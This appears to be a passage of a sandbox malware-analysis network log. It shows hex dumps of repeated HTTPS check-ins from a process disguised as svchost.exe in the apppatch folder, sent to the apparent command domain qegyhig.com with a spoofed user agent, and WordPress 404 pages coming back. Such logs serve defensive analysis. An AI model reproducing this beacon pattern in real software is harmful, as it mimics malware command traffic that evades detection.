                                                                                                                                                                                                            2024-11-11 17:08:01 UTC7116INData Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20
                                                                                                                                                                                                            Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC8302INData Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20
                                                                                                                                                                                                            Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC2586INData Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38
                                                                                                                                                                                                            Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC4096INData Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73
                                                                                                                                                                                                            Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC13046INData Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36
                                                                                                                                                                                                            Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            6192.168.2.954965188.114.96.34437444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC947INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:01 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6NixuP3VHlvY4a02QkX1H56AcLLYyzixeP91QbMAUYmbBYkmpVd9IO8pJOYEl74N4FoTtoX6by59j8%2BlD%2FFV%2B6XWnQtZLZM7bNpX2IhomPSPjiv2lwcwRKxcvQrUQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1c39d490fa9-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1357&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2219157&cwnd=246&unsent_bytes=0&cid=ecfe42cacef3ed9e&ts=806&x=0"
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC422INData Raw: 37 63 61 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                            Data Ascii: 7caa<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC1369INData Raw: 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                                                                                                                                            Data Ascii: e><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta proper
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC1369INData Raw: 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69
                                                                                                                                                                                                            Data Ascii: c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.wi
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC1369INData Raw: 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73
                                                                                                                                                                                                            Data Ascii: =typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.pars
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC1369INData Raw: 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69
                                                                                                                                                                                                            Data Ascii: atemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/mai
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC1369INData Raw: 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69
                                                                                                                                                                                                            Data Ascii: escription{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-wei
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC1369INData Raw: 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63
                                                                                                                                                                                                            Data Ascii: bkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{c
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC1369INData Raw: 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e
                                                                                                                                                                                                            Data Ascii: .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-con
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC1369INData Raw: 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70
                                                                                                                                                                                                            Data Ascii: .woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="p
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC1369INData Raw: 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 45 64 69 74 41 63 63 6f 75 6e 74 46 6f 72 6d 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 72 6f 77 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 49 6e 70 75 74 2e 69 6e 70 75 74 2d 74 65 78 74 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 61 73 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 75 6c 2e 70 61 67 65 2d 6e 75 6d 62 65 72 73 20 6c 69 20 61 3a 66 6f 63 75 73 2c 62 6f 64 79 20 23 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63 74 32
                                                                                                                                                                                                            Data Ascii: woocommerce-EditAccountForm .woocommerce-form-row .woocommerce-Input.input-text:focus,.woocommerce .ast-woocommerce-container .woocommerce-pagination ul.page-numbers li a:focus,body #content .woocommerce form .form-row .select2-container--default .select2


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            7192.168.2.954978188.114.96.34437444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-11 17:08:02 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-11 17:08:04 UTC954INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:04 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4GtruFWenSS9sqlJsjeNb2b%2FsUOT83N23rGBakcRCcgx7hQEDZ1N%2BhmKrUk5KQ9kDlUegl9pgq7iqlXgQC1DZe16XdvpuUI3%2BG4GIMZiOzs13%2B%2Fn6RogoG%2FGRucbw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1cdec5643b9-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1410&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2061209&cwnd=251&unsent_bytes=0&cid=4be37058d93a0ea8&ts=1860&x=0"
                                                                                                                                                                                                            2024-11-11 17:08:04 UTC415INData Raw: 37 63 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                            Data Ascii: 7ca4<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
